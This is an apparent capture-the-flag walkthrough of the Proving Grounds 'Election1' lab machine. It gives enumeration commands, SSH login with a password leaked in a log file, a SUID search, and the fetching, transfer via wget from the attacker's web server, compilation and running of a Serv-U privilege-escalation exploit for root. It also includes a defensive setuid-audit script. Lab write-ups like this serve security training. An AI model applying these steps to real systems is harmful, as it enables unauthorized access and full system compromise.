Proving Grounds Play: Election1

RATING

Intermediate

ENUMERATION

We kick things off with our usual nmap scan:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.211

Navigating to the target in our browser, all we see is the default Apache2 page:

Directory brute-forcing with feroxbuster yields two interesting entries, http://192.168.201.211/election/admin/ and http://192.168.201.211/election/admin/logs/:

Command: feroxbuster -u http://192.168.201.211/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k --quiet -s 200 301 302

Navigating to http://192.168.201.211/election/admin/ brings us to a login page. We try some default credentials, but it’s a no go, so we move on:

Navigating to http://192.168.201.211/election/admin/logs/, we discover a system.log file:

We download the system.log file and examine it, which reveals love:P@$$w0rd@123 as a username and password:

EXPLOITATION

We use these credentials to log into the target as user love via SSH:

Command: ssh love@192.168.201.211

PRIVILEGE ESCALATION

We check for binaries with the SUID bit set and spot a rather unusual binary named Serv-U:

Command: find / -perm -u=s -type f 2>/dev/null
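
Seen from the defender's side, the same setuid sweep can run as a recurring audit that compares results against a known-good baseline, so a binary like Serv-U is flagged as soon as it appears. This is an added example, not part of the original write-up; the BASELINE paths and SKIP_DIRS are constructed placeholders to be replaced with values from a trusted image.

```python
import os
import stat

# Constructed allowlist for illustration; build the real one from a known-good image.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount"}
# Pseudo-filesystems skipped to keep the walk fast (assumed layout).
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def find_setuid(root):
    """Yield (path, owner_uid, mode) for each regular file under root with the setuid bit."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # Prune in place so os.walk does not descend into skipped trees.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file itself, never a symlink target
            except OSError:
                continue  # vanished or unreadable between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid, stat.S_IMODE(st.st_mode)


def audit(root, baseline):
    """Return setuid files missing from the baseline, sorted by path."""
    findings = [
        {"path": p, "owner_uid": uid, "mode": oct(mode), "root_owned": uid == 0}
        for p, uid, mode in find_setuid(root)
        if p not in baseline
    ]
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for f in audit("/", BASELINE):
        tag = "root-owned" if f["root_owned"] else "uid %d" % f["owner_uid"]
        print("unexpected setuid: %s (%s, mode %s)" % (f["path"], tag, f["mode"]))
```

Root-owned findings outside the baseline deserve the first look, since a flaw in any of them runs with root privileges.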

Back on our local machine, we use searchsploit to look for a privilege escalation exploit for Serv-U:

Command: searchsploit Serv-U

We proceed to download the exploit 47009.c to our local machine:

Command: searchsploit -m 47009.c

We transfer the exploit over to the target machine to compile and execute:

Command: python3 -m http.server 80 (on attacker machine)

Command: wget http://192.168.45.153/47009.c (on target)

Compiling and executing this exploit gives us a shell as root, and we can read our proof.txt:

Command: gcc 47009.c -o servu

Command: ./servu